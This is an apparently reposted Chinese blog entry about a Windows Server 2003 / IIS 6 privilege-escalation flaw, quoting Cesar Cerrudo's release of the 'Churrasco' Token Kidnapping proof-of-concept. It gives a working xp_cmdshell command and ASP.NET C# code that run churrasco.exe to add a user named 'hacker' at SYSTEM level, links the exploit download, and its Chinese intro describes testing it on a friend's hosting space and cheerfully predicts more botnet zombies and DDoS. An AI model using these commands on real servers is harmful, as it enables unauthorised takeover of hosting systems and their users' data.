iis6+asp.net服务器致命漏洞

前天同事发现了这个漏洞，今天我又在朋友的空间测试了下，确实可以运行一切命令,

---

至今为止，MS没有出补丁，估计中国又增加成千上万的肉鸡了。DDOS又要更猛了.

It has been a long time since Token Kidnapping presentation (http://
www.argeniss.com/research/TokenKidnapping.pdf) was published so I
decided to release a PoC exploit for Win2k3 that alows to execute code
under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can
own Windows, this is because Windows services accounts can
impersonate.
Other process (not services) that can impersonate are IIS 6 worker
processes so if you can run code from an ASP .NET or classic ASP web
application then you can own Windows too. If you provide shared
hosting services then I would recomend to not allow users to run this
kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want
to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.

RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.
 Posted by Cesar Cerrudo at 4:10 PM

转载于:https://www.cnblogs.com/LCX/archive/2008/12/31/1366374.html